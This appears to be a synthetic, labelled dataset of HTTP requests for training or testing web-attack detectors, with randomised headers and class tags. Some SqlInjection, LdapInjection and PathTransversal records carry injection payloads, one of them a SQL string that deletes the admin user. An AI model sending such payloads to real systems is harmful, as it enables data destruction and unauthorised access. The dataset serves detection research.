Expect: lxltoMtt=olvdcho;8ecooa=lrlnd
From: aemYeste@u736nnw.biz
If-Modified-Since: Mon, 29 Mar 10 17:27:25 CET
If-Unmodified-Since: Mon, 29 Dec 08 04:50:02 UTC
If-Match: *
If-None-Match: "DSCC59jVe2Um5sKzr"
If-Range: *
Max-Forwards: 5
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic cmViMWxvdGE6aHhSTA==
Authorization: Digest uri=http://ese8.ch/nito/meotehoe/iNeetyek.conf
Range: 1978-3,68-
Referer: http://i1zTeOa9.it/ii9o/ir2rusn.jpeg
TE: deflate,chunked;q=0.4
Trailer: Via
User-Agent: ne7sbDiKAm/4.8.5.2.4
UA-CPU: 68000
UA-Disp: 046,3752,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6453x8240
Via: r0mmO2/8.1 201.47.103.171:48161, 4.3 99.6.215.230
Transfer-Encoding: deflate
Upgrade: betIa/6.7, vsktne/3.7, uwIfla/4.8, emds/3.7, bo14jf/6.9
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 9719110193
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10071
Start - Id: 38418
class: LdapInjection
GET /JF3Zq/wZvJ6MLNuoaIZhmIiY11.png?ysD5lki=11894&nawygwca=reyo+ntr0ae&eatrnc=uos+igo&mmlhorha2gpnhe=eec&osih=accept+hy%7C+r%25aRdsean9nm&aoFeasiy=Eh51luaoi%29t%40d&tkasrittpi2=passwdn7sehihntu&eakWauneaqFerjs=%29+%28++%7C+%28displayName%3Dhad*%29%28name++%3D++had*++++%29%28++++mail%3Dhad*++%29&fOy7A9oan16cfh=iVkylxlYpp_q&nbsj9OLnott=616716&lerk=888155337 HTTP/1.0
Host: 219.14.245.159
Connection: htpbic
Accept: audio/*, audio/x-wav;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ihjihh-onmeoTv;q=0.7, rcnhy-yer
Cache-Control: max-age=6
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Wed, 23 Jan 08 01:08:07 CET
ETag: "kA6nK6vJ4TGTsRqi"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Wed, 21 Jan 09 05:13:47 GMT
If-Unmodified-Since: Thu, 17 Jun 04 10:28:18 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: *
If-Range: Tue, 02 Jan 07 23:11:52 CET
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: s=enaetot
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM dGNpbWFhbGRlOGxlOHRhdWVvbnJhYmE4ZWFhOGp3dWU=
Range: -96373
Referer: /28anyrRR/efaa/helll/xpHsarl/dt9mbe.nsf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ceedaahen
UA-CPU: MIPS
UA-Disp: 381,973,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 6.9 www.eprdebl.png, FTP/4.8 www.slnnrr.png
Transfer-Encoding: identity
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38418
Start - Id: 25799
class: Valid
GET /g3mna/GoVorPinputlink/temiyw/c4/m0uhe1woi0irdTl0a0e9/hlQpHu4bkG./e3A/dcrsdj/n9KK/pMFzq.2g.Fjtuc8/axDHfWlN6U5DPi@.jsp? HTTP/1.0
Host: 146.102.228.46
Connection: dhtLAsw
Accept: text/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: h-mh;q=0.5, iw-sta2;q=0.9
Cache-Control: only-if-cached
Client-ip: 104.116.170.242
Cookie: ocIkYuIEaiefV=357521;Hm6=85432437;nabptf=308861;s3aawre7w7=4650547
Cookie2: $Version="1"
Date: Wed, 11 Feb 09 19:27:38 CET
ETag: W/"am6UHqCkgy34o1ENI1z"
Expect: 9tpeowE2
From: wcr0oelc@nhee9nt.fr
If-Modified-Since: Fri, 11 Jul 08 22:36:16 UTC
If-Unmodified-Since: Thu, 01 Mar 07 12:53:31 GMT
If-Match: *
If-None-Match: "V1MxnPymPrzM2nbMkEk"
If-Range: Thu, 26 Oct 06 06:31:36 CET
Max-Forwards: 1
MIME-Version: 0.6
Pragma: t=erImfna
Proxy-Authorization: Basic aG8zYXJPYjplaHV4bw==
Authorization: NTLM c25UeFJ1Mmh3eWlpcHNjZG5zcG9vdGxudE5kYjVlaGV5ZzJlZWV1c2VVN28=
Range: 644-,-02
Referer: http://www.eefN0.org/n5hceope.txt
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: eihrameoT
UA-CPU: PowerPC
UA-Disp: 7806,6470,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: HTTP/8.6 71.101.100.62
Transfer-Encoding: gzip
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 239 158.20.190.76:6540 "aylflTtnhlof" 
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25799
Start - Id: 10241
class: Valid
GET /eelv9fumiWlhvo/cIPvi/sQ/o8NLsEI/yKb_gtfnfyLnDJdE6/@3bodyconnect/opRaxwubJ@AkMnH5ec/b3FqJBWRF/lJcJcTmPp/i9KlEbG@/cilietm.js?ocp0tse=dsock_streamexecd9teT&reh=jeQAeDB8bJfC&nioeiehoChmgant=ssUv&Emvautoexechome6a9=piegrnt&bFpassthruDBEVYz6z=nnisinSnnlnLae&tca2Oa1itn5=iio1rtipHf&aoBdropH=32dlogtrcp%25to6vut%3Bhu%25or&au2AhAheudh=4&ciecw3enA5trUt=p8SyLhb&dcani=gUbEFCuTC HTTP/1.0
Host: www.honcih72b.fr
Connection: irHafln
Accept: */*;q=0.6
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: blp8tctM-n1i, nrmC9-nr, d-ntihle
Cache-Control: no-store
Client-ip: 242.45.255.170
Cookie: wt1e=840286073;nsue=Qs
Cookie2: $Version="7"
Date: Fri, 21 Aug 09 22:07:57 UTC
ETag: "yT-EIHi7W-TfRqVrOJ2"
Expect: 100-continue
From: 8ats@arc0sedxjc.net
If-Modified-Since: Mon, 11 Oct 04 05:33:43 UTC
If-Unmodified-Since: Mon, 30 Jul 07 23:55:41 GMT
If-Match: *
If-None-Match: "nQ0zqvkYYr0d9U5"
If-Range: Wed, 21 Feb 07 24:02:38 CET
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: iofsS ndhMl=s0eeaeg
Range: 48806-,859-40,-983
Referer: /m4oEun1l/eiyOt/oSs6qsw.css
TE: chunked,gzip,deflate
Trailer: Via
User-Agent: Mozilla/8.0 (Windows; U; Win98 4.5; de-Pi; rv:1.7.9) Gecko/97020482
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 090x474
Via: HTTP/4.1 www.hwehnt.shtml:051, HTTP/6.5 www.tonuTdn0.gif, 3.1 109.218.162.124
Transfer-Encoding: o8bb
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 137 www.aoert7d.jpg "raxgmxezaeEwLeicric1" 
X-Forwarded-For: 49.165.67.177
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10241
Start - Id: 9047
class: Valid
GET /Wz3n2PJfmI8_R/tazd92Oe9bHKYcDAA.tiff?ooErQstHakitoJt=99&resnSlaetas=nreval&ed=97136&whqdP9QMnc6WQ=56030&ntiafUotfsiltb=eYSD0ATzEZq&rspansnocdpr=gan&2em=swdjlqodie&fotatoeeq0omco=ucyXrlogiEtror&musatdnclee=%7Ehhesoch&shxiSuca7tryeh=aSf&tEe=ntdnGMuinputtt%40+oo HTTP/1.1
Host: 52.220.131.38
Connection: mtorr
Accept: image/*;q=0.1, text/plain;q=0.3
Accept-Charset: windows-1257;q=0.3, x-mac-japanese
Accept-Encoding: *
Accept-Language: cpadere-cear
Cache-Control: max-age=64
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="2"
Date: Thu, 27 Jan 05 03:53:12 GMT
ETag: "DI4ds9YeaV3hd@S_XAy"
Expect: rua8eTaD=haolmyh;ktaNk
From: 48c280@SmrnD71.net
If-Modified-Since: Mon, 11 Jul 05 16:19:19 CET
If-Unmodified-Since: Sat, 03 Dec 05 02:13:12 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 23:47:43 UTC
Max-Forwards: 2588
MIME-Version: 8.0
Pragma: aH=beeeot
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: Digest nonce
Range: -9,-8753
Referer: http://www.rsGi.de/uloeh/F9Saye/cape/rittIu74/jtfgrcit.mpeg
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: mr3B5q76 http://www.enfh.st
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 117x032
Via: 1.2 149.243.70.125, 2.6 www.eerho.jpeg
Transfer-Encoding: sej6x; elhr=oPntiN
Upgrade: hrimd/4.4
Warning: 283 116.154.53.88 "5oiE4hneih" "Sat, 27 Jan 07 01:20:17 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9047
Start - Id: 45219
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.hadr8m.be:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: euc-tw;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 22.54.242.219
Cookie: 5aameT=qsE1w&d'setn;ndcaahs=8878;xltmbEranou3=fi
Cookie2: $Version="174"
Date: Tue, 06 May 08 18:13:03 CET
ETag: "Fye-r9dja0fSKIbx"
Expect: 100-continue
From: 1p4rry@estl2a.org
If-Modified-Since: Fri, 14 Mar 08 23:11:35 UTC
If-Unmodified-Since: Sat, 29 Nov 08 14:37:13 UTC
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "DGu6J8oAgQ73WlXb_C"
If-Range: *
Max-Forwards: 69
MIME-Version: 3.6
Pragma: lx='enaSr'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM MXBhbmt5bmFPbm9RaWFyZ2VlYm9uanVndHRhZWlhc2VhYQ==
Range: -01750,762-,10389-0
Referer: http://www.ausEsbsr.ch/RWino/irwirg/texxk4tr.tiff
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 5.7; s0-oi; rv:0.0.9) Gecko/08206506
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/2.4 www.ja1aeac7.png, FTP/4.6 www.obEnape.htm
Transfer-Encoding: lconiN
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 50.104.249.90
X-Serial-Number: 706890452941318
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45219
Start - Id: 42653
class: SqlInjection
GET /nupTipeoh/E2ELhtaccesUDqKvA/fCktlslox/ly6ijt/femcsoib.aspx?eLonaf=r%24agk&ws=ryescripteNgttmgu9connect&Tnmo4kbaTy=s%5Cwinntesdsj&SYYinputaSjPxprocessing-instruction.=20tA&ebnnif=%27++++OR+%27tr3naereaero%27+LIKE++%27aze%2525&httpswfNG4StH=1UTDjSsyP&sjEb.vbscriptY=008330&dicreeey5=nraeeitim2ohaw HTTP/1.1
Host: 120.198.120.217:0
Connection: osltiwce
Accept: application/*;q=0.8
Accept-Charset: windows-1251;q=0.0, x-mac-turkish, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=339
Client-ip: 183.138.44.237
Cookie: ceeo4=803
Cookie2: $Version="9"
Date: Thu, 19 Nov 09 01:27:50 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Sun, 14 Aug 05 21:30:20 GMT
If-Match: *
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 0023
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest username="aaitl"
Range: -5
Referer: /Aa9sefdH/g3Qyl/esinha/snc8m4/erdcossg.pl
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: x1ah5mttn
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: ikne; sdrt4=tRlrnb2
Upgrade: tehfc/4.6, Ehs/2.9, ereo/5.2
Warning: 589 203.56.73.253 "n545" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 593816636340415
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42653
Start - Id: 17411
class: Valid
GET /eFFnMLiv2cyB.5S/niad/zvirtt8neihoBiidzgnC/y6Di8T5VaOvGpfbCQ6o/jehukpbhofOkeict6/yo6J3U@5/4eeddp/between33flike0aVPlY/oE2it/Wocc5q/rVdOAAm19Q938bP0.js?1ddhasiAitfw6w=rtypwo+t+bnetcatlah++n%26ae&oe=616648879&7botdUjaeoYo=tO%2Bajisu&T@MkuurVqscriptK=foeetlgh8t&ryi=byYuhienpmk&6Q2fFmMh=tphsemttnNe9nuTr HTTP/1.1
Host: 228.86.23.174
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.6, x-mac-icelandic, iso-8859-9, x-mac-chinesesimp;q=0.7
Accept-Encoding: identity;q=0.5, gzip;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 250.69.117.123
Cookie: to8=63;uDOA-ChGBhq=$E
Cookie2: $Version="0"
Date: Sat, 30 Apr 05 01:43:57 CET
ETag: W/"dV5yelKbxCIFgsDSGD"
Expect: 100-continue
From: ttdntmte@un8ztuz.it
If-Modified-Since: Sat, 05 Dec 09 15:47:37 GMT
If-Unmodified-Since: Tue, 23 Feb 10 10:02:59 GMT
If-Match: *
If-None-Match: *
If-Range: "bFzijE-pLZbEW2LZEHi"
Max-Forwards: 18
MIME-Version: 7.2
Pragma: pnaenhcp=weiu
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic NHB0YWJzaDpocjZ1SmFw
Range: -29
Referer: http://p0s3xtnn.org/n9lnw.exe
TE: trailers,deflate,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 4.2; iz-aR; rv:3.5.2) Gecko/94815345
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
Via: FTP/8.4 15.57.65.14
Transfer-Encoding: vsestp; aAexaH=9utoTmio
Upgrade: sAt/7.1
Warning: 151 204.205.148.246 "TOenuhitnddnt0" "Thu, 19 Apr 07 11:55:59 UTC"
X-Forwarded-For: 233.13.162.49
X-Serial-Number: 8161567353298510
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17411
Start - Id: 9024
class: Valid
GET /NtdaCSnw779xaaelyVb/_xml/utd7jhf.OvJO@/a0v9E4itJ6E8PplOcw/olnHseeDfIs2eera/rnepLcaiyiSl/fnh1_KA2v/IIZs/yOvesnpuek7qn0rEnnY/naiutlen1.aspx?bnetcatHscriptc-N8-servicesGT=5953&y4ntQqua3smfA=tnA57ukxzaUu&KzPKtbU_yU=neXhz5Uh6Fv&Rbody_YWYUFPbU=wPNF1gs2TNC&otTTincs=pI%7Cwohsn&s7l0Geahem28=42407724&rtiioertc5veinn=reo40Ttaj2 HTTP/1.1
Host: www.dstmsqqsse.gov
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=08815
Client-ip: 229.167.212.175
Cookie: wEeoc=rScMQMIRP7J2;lcehblatalkr=7407;ceW=bJ.at;erhugt=69;as8e=keanispr<;tLwhmbfNmtittiy=4058
Cookie2: $Version="71"
Date: Thu, 31 Dec 09 10:52:18 CET
ETag: "menuXqdYvhTCYszqhrT"
Expect: rsna=taeheo4;iaiNrrni
From: haaa@uRemarat.uk
If-Modified-Since: Tue, 09 Feb 10 15:44:08 CET
If-Unmodified-Since: Wed, 29 Mar 06 07:41:57 GMT
If-Match: *
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: Thu, 25 Feb 10 23:06:34 UTC
Max-Forwards: 323
MIME-Version: 0.6
Pragma: rtkaEog='oNceHwo'
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: NTLM cmI1ZWV5eGxCbWlvaW0yTmlocmxmZ2JzZG1GdG5zdWVvYXNUVXRXODdh
Range: 64-0,4817-81
Referer: /soitroi/aanpemcN/dA7cl/egeog6e/Sihfsa.doc
TE: trailers,deflate,trailers
Trailer: From
User-Agent: triEiman7negeys8
UA-CPU: Sparc
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7425x380
Via: HTTP/8.0 206.83.29.247, FTP/5.7 www.tsdp.js:055, 5.9 27.42.143.67
Transfer-Encoding: deflate
Upgrade: dwsena/9.6
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9024
Start - Id: 35286
class: SqlInjection
GET /rsnbh/aeea6/aiacrNOna6Rbealeinrt/include.y-Q/mxhrQQ0yQRmejd4rcz.pl?sblcxTatI=nHedu3ene%27+++%29%3B++DEL%2F**%2FETE+FROM++users++++WHERE+++upper%28username%29++++%3D+++++upper%28+++%27admin&gG3S-iU=aott&httpsxtermEv-.=toh6ho0r9umhmrRdner&ncnn@CZOoTP=Kcbnn&sceeY8Rd=0011&wats=lwwaoer4n3e HTTP/1.1
Host: www.rRntaeh.ch:2554
Connection: keep-alive
Accept: text/*;q=0.7, application/rtf;q=0.8, video/quicktime;q=0.1
Accept-Charset: x-mac-arabic;q=0.5, gb2312, iso-8859-8, x-mac-greek
Accept-Encoding: identity, deflate;q=0.2, deflate;q=0.9, compress;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.242.130.149
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Tue, 13 May 08 14:15:52 CET
ETag: W/"2sx.p018_PGCYon"
Expect: tomlS4
From: g1swIsn@rorentof.uk
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: *
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Fri, 27 Feb 09 22:12:19 CET
Max-Forwards: 48
MIME-Version: 8.3
Pragma: O=xEupnsst
Proxy-Authorization: NTLM bnFzaU5lenR0dWVzeFNuZXNiaVRsTFNiMnNhMmRzc3dhdGZzNg==
Authorization: NTLM cnRydTI3cWhkZXByUm51c3R3dG5yZXRucm5pbW41cm9OZ2Q1cXhvU3R5ZWs=
Range: 930-456,2355-
Referer: http://www.eImttsP9.net/a0hwE/dthen/ttode.mp3
TE: gzip;q=0.4,chunked;q=0.1
Trailer: Warning
User-Agent: Mozilla/0.7 (Windows; U; WinNT 0.4; ls-yr; rv:0.2.6) Gecko/61617298
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 2.2 www.ionv.jpeg, e1nEni/4.6 255.165.90.18:2
Transfer-Encoding: saih3d; nnlSm=0canoe
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35286
Start - Id: 15173
class: Valid
GET /iurdLrrWldtcnpUtA/1c/rJhs/window.openK/hKGvZ8ed@IpYtA/asnnshnpnhamaseetotr/hiaimIrs/r3U_QJtdw-5U0acND.bin?7aeaoqi=rJ%40bBp&kbstih=letfyn+hRsaform&iah4te=8&PjVRaccess_log3=rtee8uyi95&dttsPi2e=tnu&rhhiecioh0Fat=let HTTP/1.0
Host: www.uaWb.ch
Connection: keep-alive
Accept: audio/*;q=0.8, text/*;q=0.7, text/html;q=0.5
Accept-Charset: iso-8859-4, koi8-r, isiri-3342, iso-10646-ucs-2, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 41.201.209.63
Cookie: nasIlOauo4=>An9fdog$httpsrt;ahxlwtkeess=6196;kohglq=97;eEoedcfpte3sno=e9F8qe.ED
Cookie2: $Version="478"
Date: Mon, 06 Nov 06 13:21:40 GMT
ETag: "uKhJ_6FYtzvSVFVUMN"
Expect: dS0aus1=aho6;ayt4=etsiBq0
From: ri8aris@kss9q0t5.gov
If-Modified-Since: Tue, 02 Aug 05 13:05:53 UTC
If-Unmodified-Since: Thu, 24 May 07 03:59:10 UTC
If-Match: "HTP._LvD1pmHI0WnK34"
If-None-Match: "ka.ewUbk86rfLGr"
If-Range: Fri, 21 Nov 08 13:29:43 UTC
Max-Forwards: 5782
MIME-Version: 5.5
Pragma: iuo6l=7
Proxy-Authorization: 0egko teahel=semo
Authorization: u5Ais7 iaei=traPeqs
Range: -96,366774-,-767
Referer: /wet4/ujoYe/htnh/cpyys/Deoneo.asp
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (compatible; Konqueror/1.3; WinNT; ruye8l; iHyj; hwoa)
UA-CPU: PowerPC
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1372x650
Via: 3.0 143.76.198.150
Transfer-Encoding: deflate
Upgrade: emoNct/7.8
Warning: 690 www.t1telndw.html:946 "arsnbcneaieqbgnpwaea" 
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 54307917779872
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15173
Start - Id: 6058
class: Valid
PUT /iek7ndCJ2hpqPxV/osqh_gE4t7aYn/fO/ofco/DpNKvR@Z/ee6O_EBFWub./arHyIdmlUx6E18Vi/eWfEZuZQRmsNk19/iZSx0tzo9_1wC1ZL1Y/tIxtt96@uQ/mxEorg.dll? HTTP/1.0
Content-Length: 198
Content-Language: 5,asi
Content-Encoding: compress
Content-Location: http://laeeS.cz/3sriaet.jpeg
Content-MD5: aWVhNWRjYmRmY3RoUnJuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 09:14:19 GMT
Last-Modified: Sun, 27 Aug 06 07:01:16 GMT
Host: 121.241.116.196:2
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 103.109.199.183
Cookie: taEoDesto=122;7htpasslsAzhk=skeeipR4oaws;documentDeAIPHYnetcatm= Rrh ijtvTfOl;i1lr ;ri=ix8kQE@hRU4;hcqhe=bniwUr0pvV
Cookie2: $Version="45"
Date: Fri, 31 Dec 04 07:19:18 GMT
ETag: W/"MUiw9r03_b@a40PMsi"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Mon, 19 Dec 05 14:42:26 UTC
If-Unmodified-Since: Mon, 14 Sep 09 05:35:56 CET
If-Match: ".v1u1w7NmL.eCeD"
If-None-Match: *
If-Range: Sat, 05 Apr 08 18:49:45 UTC
Max-Forwards: 9
MIME-Version: 3.9
Pragma: itrrs='daD'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: egteC fnjrq=mlnwred
Range: -49420,-860
Referer: http://www.EeSwtinb.st/solz/i9hwag.dll
TE: trailers,chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: tkk3ljmnnk/0.3
UA-CPU: StrongARM
UA-Disp: 6911,1089,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 4.8 www.or5Aanto.jpg, eeEp/2.0 www.eipsviA.css
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 497 56.128.16.254 "srleiwfnruIct" 
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 172658995199339
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mv7Yvh9y=000149&tyDukNmfrom0dF=7&lrnkensgsMP3oi=oulopdrnz9lIcnou&mk=em&id2=e&hfdehu=<tt~%u&bttrrjotsd=e63WMSn.m6&oionarUi9esahe=rmz&ehh4egc=o@O&ycnetTi=h_dZjK&ahpe9kepn=35709394&88731TiGJu=c

End - Id: 6058
Start - Id: 7059
class: Valid
POST /cebxCNH1z_SCFKF/wrrA/do-5gz-zKNevalb5E/2JD/H9/oEaSda/nuGz4LhJ/db4yZxWIg2j@CiYah.htm? HTTP/1.1
Content-Length: 148
Content-Language: TweueatM,nr7oJsmt,gnEt
Content-Encoding: deflate
Content-Location: /Apsiias/rentoi/hwootip/ladE08a/wcel3a.pdf
Content-MD5: aWNtZW50bGNzaVNodG9hZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 04:57:18 GMT
Last-Modified: Mon, 13 Nov 06 01:05:18 CET
Host: www.qmoed3s.uk
Connection: close
Accept: video/mpeg;q=0.1, video/quicktime, image/*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.7, iso-8859-2;q=0.2, x-mac-arabic;q=0.0, utf-7
Accept-Encoding: compress;q=0.0, compress;q=0.8
Accept-Language: anhe-h;q=0.9, ubc-nasmeedi, pzcnstuI-4yt, ulud-niaiae;q=0.2, itnt-elii;q=0.9
Cache-Control: min-fresh=367
Client-ip: 132.198.29.0
Cookie: rnt=832
Cookie2: $Version="4"
Date: Sat, 04 Aug 07 06:55:42 GMT
ETag: W/"zqSNf80KOhG4_gtigkN"
Expect: Ol2jw
From: meebonii@Etgu.be
If-Modified-Since: Tue, 23 May 06 01:28:43 CET
If-Unmodified-Since: Sat, 02 Apr 05 11:14:09 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Jul 04 15:47:22 GMT
Max-Forwards: 43
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VpcmF4OmFhYm1hbg==
Authorization: NTLM b2thdHRtanVlZVhjUzk2dWVwbXNlb2VlMWhlb2F1aW5FaXQ=
Range: 51061-93,46103-3,-27
Referer: http://boT3.ch/isin.pl
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.5 (compatible; MSIE 5.9; Linux i586; qEvfgesdq)
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: nmsco/8.1 www.etEir.png:3183, 1.1 24.241.240.169, 3.6 86.156.255.56
Transfer-Encoding: deflate
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 243.127.72.185
X-Serial-Number: 484018235309
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

har3=4822&llae6iStNiew=200663&rcdtsp=jao\linput&samh+ay~&o1aetlvdibcaa=ptrsod4eobheadOtt&tbGfGIThtpassDQOI=3994734&qhoZto=7950&n6cienZ=nsesm

End - Id: 7059
Start - Id: 21251
class: Valid
GET /oSTeR.tiff? HTTP/1.1
Host: 23.81.41.33:80
Connection: nkvDai
Accept: */*;q=0.9
